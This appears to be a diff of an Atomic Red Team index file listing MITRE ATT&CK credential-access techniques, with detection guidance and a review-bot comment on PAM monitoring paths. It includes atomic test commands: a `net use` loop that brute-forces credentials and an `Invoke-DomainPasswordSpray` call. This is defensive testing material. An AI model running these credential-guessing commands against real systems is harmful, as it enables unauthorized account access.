- - Process monitoring
- - DLL monitoring
+ samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module
+ paths (ex: /etc/pam.d/) for changes. Use system-integrity tools
+ such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure
+ robust, consistent account activity audit policies across the enterprise and
+ with externally accessible services. (Citation: TechNet Audit Policy) Look
+ for suspicious account behavior across systems that share accounts, either
+ user, admin, or service accounts. Examples: one account logged into multiple
+ systems simultaneously; multiple accounts logged into the same machine simultaneously;
+ accounts logged in at odd times or outside of business hours. Activity may
+ be from interactive login sessions or process ownership from accounts being
+ used to execute binaries on a remote system as a particular account. Correlate
+ other security systems with login information (e.g., a user has an active
+ login session but has not entered the building or does not have VPN access)."
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1003.003:
technique:
+ created: '2020-02-11T18:42:35.572Z'
+ modified: '2020-03-24T20:39:39.949Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24
description: |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
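Review bot: The new PAM detection sentence gives `/etc/pam.d/` as its only example path, but PAM modules themselves are loaded from a shared-library directory (distribution-dependent, e.g. `/lib/security/` or `/lib/x86_64-linux-gnu/security/`), so a replaced `pam_unix.so` leaves `/etc/pam.d/` untouched and would be missed by a monitor scoped to that example; `/etc/pam.conf` is likewise a valid configuration location on some systems. Suggest widening the example to `Monitor PAM configuration and module paths (ex: /etc/pam.d/, /etc/pam.conf, and the distribution's PAM module directory such as /lib/security/) for changes.` so that AIDE/auditd rules derived from this text cover the module binaries as well as the configuration. The `x_mitre_detection` value this hunk edits begins in the preceding hunk, and if this index is regenerated from the upstream ATT&CK STIX data the wording change belongs upstream.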
@@ -18222,30 +18526,24 @@ credential-access:
to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory
Forest. Retrieved February 3, 2015.
source_name: Metcalf 2015
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:39:39.949Z'
- created: '2020-02-11T18:42:35.572Z'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_detection: Monitor processes and command-line arguments for program
- execution that may be indicative of credential dumping, especially attempts
- to access or copy the NTDS.dit.
- x_mitre_system_requirements:
- - Access to Domain Controller or backup
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_data_sources:
- Windows event logs
- Process command-line parameters
- PowerShell logs
- Process monitoring
- x_mitre_permissions_required:
- - Administrator
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_system_requirements:
+ - Access to Domain Controller or backup
+ x_mitre_detection: Monitor processes and command-line arguments for program
+ execution that may be indicative of credential dumping, especially attempts
+ to access or copy the NTDS.dit.
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
identifier: T1003.003
atomic_tests:
- name: Create Volume Shadow Copy with NTDS.dit
@@ -18417,15 +18715,16 @@ credential-access:
elevation_required: true
T1040:
technique:
- id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Network Sniffing
- description: |-
- Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
- Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
-
- Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ created: '2017-05-31T21:30:41.399Z'
+ modified: '2020-03-25T21:03:49.610Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1040
@@ -18433,16 +18732,15 @@ credential-access:
- external_id: CAPEC-158
source_name: capec
url: https://capec.mitre.org/data/definitions/158.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-25T21:03:49.610Z'
- created: '2017-05-31T21:30:41.399Z'
+ description: |-
+ Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+ Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+
+ Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ name: Network Sniffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
x_mitre_version: '1.1'
x_mitre_data_sources:
- Network device logs
@@ -18594,17 +18892,17 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T16:25:16.928Z'
+ modified: '2020-06-09T20:46:00.758Z'
created: '2017-05-31T21:30:19.735Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Vincent Le Toux
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - PowerShell logs
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
x_mitre_detection: "### Windows\nMonitor for unexpected processes interacting
with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from
Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002)
@@ -18644,15 +18942,15 @@ credential-access:
ships stock in many Linux distributions, can be used to watch for hostile
processes opening this file in the proc file system, alerting on the pid,
process name, and arguments of such programs."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - PowerShell logs
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '2.0'
identifier: T1003
atomic_tests:
- name: Powershell Mimikatz
@@ -18784,27 +19082,26 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:01:56.911Z'
+ modified: '2020-07-09T17:01:18.054Z'
created: '2020-02-11T18:38:56.197Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - Azure
- - Office 365
- - Azure AD
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: It is difficult to detect when hashes are cracked, since
this is generally done outside the scope of the target network. Consider focusing
efforts on detecting other adversary behavior used to acquire credential materials,
such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Office 365
+ - Azure AD
atomic_tests: []
T1556.002:
technique:
@@ -18848,22 +19145,22 @@ credential-access:
phase_name: defense-evasion
modified: '2020-03-25T20:59:05.209Z'
created: '2020-02-11T19:05:45.829Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
@@ -18944,6 +19241,19 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T17:11:46.504Z'
created: '2020-02-11T18:38:22.617Z'
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -18954,19 +19264,6 @@ credential-access:
- AWS
- Azure
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
identifier: T1110.001
atomic_tests:
- name: Brute Force Credentials
@@ -19006,26 +19303,13 @@ credential-access:
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
T1110.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1110.003
- url: https://attack.mitre.org/techniques/T1110/003
- - url: http://www.blackhillsinfosec.com/?p=4645
- description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
- RPCCLIENT. Retrieved April 25, 2017.
- source_name: BlackHillsInfosec Password Spraying
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- - source_name: Trimarc Detecting Password Spraying
- url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
- description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
- Spraying with Security Event Auditing. Retrieved January 16, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Password Spraying
+ created: '2020-02-11T18:39:25.122Z'
+ modified: '2020-03-29T17:13:57.172Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -19047,13 +19331,26 @@ credential-access:
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
- id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-29T17:13:57.172Z'
- created: '2020-02-11T18:39:25.122Z'
+ name: Password Spraying
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110.003
+ url: https://attack.mitre.org/techniques/T1110/003
+ - url: http://www.blackhillsinfosec.com/?p=4645
+ description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
+ RPCCLIENT. Retrieved April 25, 2017.
+ source_name: BlackHillsInfosec Password Spraying
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ - source_name: Trimarc Detecting Password Spraying
+ url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
+ description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
+ Spraying with Security Event Auditing. Retrieved January 16, 2019.'
x_mitre_platforms:
- Linux
- macOS
@@ -19130,6 +19427,69 @@ credential-access:
Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
'
+ T1556.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.003
+ url: https://attack.mitre.org/techniques/T1556/003
+ - source_name: Apple PAM
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ - source_name: Man Pam_Unix
+ url: https://linux.die.net/man/8/pam_unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ - source_name: Red Hat PAM
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ - source_name: PAM Backdoor
+ url: https://github.com/zephrax/linux-pam-backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ - source_name: PAM Creds
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Pluggable Authentication Modules
+ description: |-
+ Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
+
+ Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
+
+ Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-13T21:23:01.370Z'
+ created: '2020-06-26T04:01:09.648Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
+ x_mitre_detection: |-
+ Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
+
+ Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ atomic_tests: []
T1552.004:
technique:
id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
@@ -19174,23 +19534,23 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T21:36:36.613Z'
created: '2020-02-04T13:06:49.258Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - File monitoring
x_mitre_detection: Monitor access to files and directories related to cryptographic
keys and certificates as a means for potentially detecting access patterns
that may indicate collection and exfiltration activity. Collect authentication
logs and look for potentially abnormal activity that may indicate improper
use of keys or certificates for remote authentication.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1552.004
atomic_tests:
- name: Private Keys
@@ -19309,10 +19669,10 @@ credential-access:
phase_name: credential-access
modified: '2020-03-19T15:32:18.098Z'
created: '2020-02-11T18:46:24.434Z'
- x_mitre_platforms:
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: To obtain the passwords and hashes stored in memory, processes
must open a maps file in the /proc filesystem for the process being analyzed.
This file is stored under the path /proc/\*/maps, where the \*
@@ -19320,10 +19680,10 @@ credential-access:
data. The AuditD monitoring tool, which ships stock in many Linux distributions,
can be used to watch for hostile processes opening this file in the proc file
system, alerting on the pid, process name, and arguments of such programs.
- x_mitre_permissions_required:
- - root
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1003.002:
technique:
@@ -19359,10 +19719,14 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T15:17:30.640Z'
created: '2020-02-11T18:42:07.281Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
x_mitre_detection: Hash dumpers open the Security Accounts Manager (SAM) on
the local file system (%SystemRoot%/system32/config/SAM) or create
a dump of the Registry SAM key to access stored account password hashes. Some
@@ -19370,14 +19734,10 @@ credential-access:
SAM table to avoid file access defenses. Others will make an in-memory copy
of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078)
in-use by adversaries may help as well.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1003.002
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
@@ -19484,18 +19844,18 @@ credential-access:
phase_name: credential-access
modified: '2020-02-17T13:16:53.850Z'
created: '2020-02-12T18:56:31.051Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: Monitor processes and command-line arguments for activity
surrounded users searching for credentials or using automated tools to scan
memory for passwords.
- x_mitre_permissions_required:
- - root
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1558.002:
technique:
@@ -19533,10 +19893,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T21:46:46.831Z'
created: '2020-02-11T19:14:48.309Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation:
ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes
@@ -19545,11 +19906,10 @@ credential-access:
Service (LSASS) process by opening the process, locating the LSA secrets key,
and decrypting the sections in memory where credential details, including
Kerberos tickets, are stored."
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1528:
technique:
@@ -19624,35 +19984,36 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-23T15:59:40.522Z'
+ modified: '2020-07-14T19:16:30.906Z'
created: '2019-09-04T15:54:25.684Z'
- x_mitre_data_sources:
- - Azure activity logs
- - OAuth audit logs
- x_mitre_contributors:
- - Shailesh Tiwary (Indian Army)
- - Mark Wee
- - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - SaaS
- - Office 365
- - Azure AD
+ x_mitre_is_subtechnique: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.
+ x_mitre_platforms:
+ - SaaS
+ - Office 365
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Shailesh Tiwary (Indian Army)
+ - Mark Wee
+ - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
+ - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
+ x_mitre_data_sources:
+ - Azure activity logs
+ - OAuth audit logs
atomic_tests: []
T1539:
technique:
external_references:
- - external_id: T1539
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1539
url: https://attack.mitre.org/techniques/T1539
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
@@ -19666,9 +20027,9 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware
Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
- - source_name: Github evilginx2
+ - description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.
url: https://github.com/kgretzky/evilginx2
- description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.
+ source_name: Github evilginx2
- source_name: GitHub Mauraena
url: https://github.com/muraenateam/muraena
description: Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved
@@ -19682,7 +20043,7 @@ credential-access:
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
- There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Mauraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
+ There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.
id: attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff
@@ -19690,26 +20051,27 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2019-10-22T19:59:20.282Z'
+ modified: '2020-04-21T15:26:25.584Z'
created: '2019-10-08T20:04:35.508Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Monitor for attempts to access files and repositories on
+ a local system that are used to store browser session cookies. Monitor for
+ attempts by programs to inject into or dump browser process memory.
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Johann Rehberger
x_mitre_platforms:
- Linux
- macOS
- Windows
- Office 365
- SaaS
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Johann Rehberger
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- x_mitre_detection: Monitor for attempts to access files and repositories on
- a local system that are used to store browser session cookies. Monitor for
- attempts by programs to inject into or dump browser process memory.
atomic_tests: []
T1558:
technique:
@@ -19772,10 +20134,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-31T12:59:11.121Z'
created: '2020-02-11T19:12:46.830Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634),
RC4 encryption within ticket granting tickets (TGTs), and ticket granting
@@ -19795,17 +20158,37 @@ credential-access:
access the LSA Subsystem Service (LSASS) process by opening the process, locating
the LSA secrets key, and decrypting the sections in memory where credential
details, including Kerberos tickets, are stored."
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- x_mitre_system_requirements:
- - Kerberos authentication enabled
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1111:
technique:
- id: attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Two-Factor Authentication Interception
